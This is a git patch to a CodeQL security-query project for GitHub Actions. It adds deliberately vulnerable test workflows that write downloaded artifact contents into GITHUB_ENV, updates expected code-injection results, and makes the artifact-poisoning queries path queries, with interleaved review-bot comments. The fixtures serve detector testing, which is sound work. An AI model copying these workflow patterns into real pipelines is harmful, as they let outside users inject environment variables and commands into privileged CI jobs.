@@ -309,8 +309,8 @@ subpaths | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml index ca074428ccf..71f590fbc9c 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml @@ -18,7 +18,3 @@ jobs: - name: Env Var Injection run: | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV - - - - diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml new file mode 100644 index 00000000000..130668b8515 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml 
@@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Env Var Injection + run: | + echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" + ls | grep -E "*.(tar.gz|zip)$" >> "${GITHUB_ENV}" + ls | grep -E "*.(txt|md)$" >> "${GITHUB_ENV}" + echo "EOF" >> "${GITHUB_ENV}" + + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml new file mode 100644 index 00000000000..7c255e7722d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml @@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + + + + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected index 907979b88e7..ab07d0a2f38 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected 
@@ -8,3 +8,5 @@ | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | Potential artifact poisoning. | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | Potential artifact poisoning. | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | From ed70ef03078077d943baebd2e4480db9b6830b17 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Apr 2024 15:46:49 +0200 Subject: [PATCH 0167/1267] Make Artifact poisoning query a path problem --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 16 +- .../security/ArtifactPoisoningQuery.qll | 21 + ql/src/Security/CWE-829/ArtifactPoisoning.ql | 24 +- .../CWE-829/PrivilegedArtifactPoisoning.ql | 27 ++ ql/test/library-tests/test.expected | 448 +----------------- .../CWE-829/ArtifactPoisoning.expected | 52 +- .../PrivilegedArtifactPoisoning.expected | 52 ++ .../CWE-829/PrivilegedArtifactPoisoning.qlref | 2 + 8 files changed, 166 insertions(+), 476 deletions(-) create mode 100644 ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql create mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected create mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.qlref diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 0fd3f82b2f7..3988f2190ab 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -82,22 +82,18 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da } /** - * A downloaded artifact that gets assigned to an env var declaration. - * - uses: actions/download-artifact@v2 - * - run: echo "::set-env name=id::$(; 
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index bd9ec090f7f..6d3910e2ca5 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -1,9 +1,9 @@ /** * @name Artifact poisoning * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps. - * @kind problem + * @kind path-problem * @problem.severity warning - * @precision medium + * @precision high * @security-severity 9.3 * @id actions/artifact-poisoning * @tags actions @@ -13,11 +13,19 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery +import ArtifactPoisoningFlow::PathGraph -from LocalJob job, ArtifactDownloadStep downloadStep, PoisonableStep step +from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink where - // Workflow is privileged - job.getWorkflow().isPrivileged() and - // Download step is followed by a step that may be poisoned by the download - downloadStep.getAFollowingStep() = step -select downloadStep, "Potential artifact poisoning." + ArtifactPoisoningFlow::flowPath(source, sink) and + ( + exists(source.getNode().asExpr().getEnclosingCompositeAction()) + or + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + not w.isPrivileged() + ) + ) +select sink.getNode(), source, sink, + "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, + sink.getNode().toString() diff --git a/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql b/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql new file mode 100644 index 00000000000..cd6d5eeb108 --- /dev/null +++ b/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql 
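Review bot: The header of `ArtifactPoisoning.ql` keeps `@security-severity 9.3` and raises `@precision` to `high`, while the `where` clause in the second hunk now limits the query to composite actions and workflows that are `not w.isPrivileged()`; the new `PrivilegedArtifactPoisoning.ql` carries `@security-severity 9`. That scores the unprivileged finding above the privileged one, which looks inverted for triage. I would lower the score here or raise it in the privileged query so it follows the `warning`/`error` split already used for `@problem.severity`. The description could also read `influence subsequent steps`.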
@@ -0,0 +1,27 @@
+/**
+ * @name Artifact poisoning
+ * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps.
+ * @kind path-problem
+ * @problem.severity error
+ * @precision high
+ * @security-severity 9
+ * @id actions/privileged-artifact-poisoning
+ * @tags actions
+ * security
+ * external/cwe/cwe-829
+ */
+
+import actions
+import codeql.actions.security.ArtifactPoisoningQuery
+import ArtifactPoisoningFlow::PathGraph
+
+from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink
+where
+ ArtifactPoisoningFlow::flowPath(source, sink) and
+ exists(Workflow w |
+ w = source.getNode().asExpr().getEnclosingWorkflow() and
+ w.isPrivileged()
+ )
+select sink.getNode(), source, sink,
+ "Potential privileged artifact poisoning in $@, which may be controlled by an external user.",
+ sink, sink.getNode().toString()
diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected
index aa2ccdcfe9c..a6be2226b8c 100644
--- a/ql/test/library-tests/test.expected
+++ b/ql/test/library-tests/test.expected
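Review bot: `@name` and `@description` are copied unchanged from ArtifactPoisoning.ql, so the two queries appear under the same title in result lists and only the id tells them apart. A distinct name such as ` * @name Artifact poisoning in a privileged workflow`, with a description that mentions the privileged context, would make triage unambiguous. The `where` clause also matches only sources that have an enclosing workflow, so a source inside a composite action is presumably never reported at `error` level here, even when that action is used from a privileged workflow. If that is intended, a one-line comment above the `exists(Workflow w | ...)` saying so would help.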
@@ -1,446 +1,2 @@ -files -| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | -| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | -workflows -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/test.yml:1:1:40:53 | on: push | -reusableWorkflows -compositeActions -jobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -localJobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -extJobs -steps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -runSteps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ 
github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | -runExprs -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | 
.github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -uses -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -stepUses -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -usesArgs -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -runStepChildren -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | 
.github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -parentNodes -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| 
.github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: 
issue_comment | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | 
.github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | 
.github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | 
.github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| 
